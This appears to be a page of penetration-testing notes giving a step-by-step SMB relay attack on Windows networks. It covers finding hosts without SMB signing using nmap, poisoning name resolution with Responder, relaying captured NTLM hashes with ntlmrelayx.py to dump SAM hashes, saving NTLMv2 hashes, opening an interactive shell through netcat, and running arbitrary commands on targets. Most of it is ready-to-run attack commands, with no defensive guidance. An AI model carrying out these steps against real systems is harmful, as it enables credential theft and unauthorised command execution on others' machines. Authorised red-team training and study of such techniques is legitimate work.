SMB Relay
Steps
Identify Host without SMB Signing
Configure Responder
Run Responder
Run NTLM Relay
Wait for an event (SMB connection, User login, etc.)
Capture Hash
Requirements
SMB signing must be Disabled or Not Enforced
By default, SMB signing is Disabled on workstations.
SMB signing is enabled on Servers.
Relayed user credentials must be Local Admin on machine for any real value.
You cannot capture the hash on your machine and relay it back to yourself. You have to relay it on another machine.
SMB Relay Enumeration
General Usage: nmap --script=smb2-security-mode.nse -p445 [IP]-Pn
nmap --script=smb2-security-mode.nse -p445 10.1.1.14-15 -Pn
Configure Responder
The SMB and HTTP options should be turned off.
sudo nano /etc/responder/Responder.conf
Responder
General Usage: sudo responder -I [net interface] -dPv
sudo responder -I eth0 -dPvNTLM Relay
General Usage: sudo ntlmrelayx.py -tf [target hosts] -smb2support
Once the event has been triggered, ntlmrelayx.py will relay the captured hash to the target hosts and will attempt to dump the local SAM hashes.
sudo ntlmrelayx.py -tf hosts.txt -smb2support
Store NTLMv2 Hashes
When you run the SMB Relay attack normally, it won't show you the NTLMv2 that was relayed to the machines. You can use the option --output-file [filename] to store the relayed NTLMv2 hash to a file.
sudo ntlmrelayx.py -tf hosts.txt -smb2support --output-file ntlmv2.txtOther SMB Relay Attacks
Interactive Shell
You would also need to run netcat to access the client shell.
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
nc 127.0.0.1 11000
Run Commands
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Cracking SAM Hashes
Refer to the Hashcat page under Password Attacks section: NTLM Hash
Last updated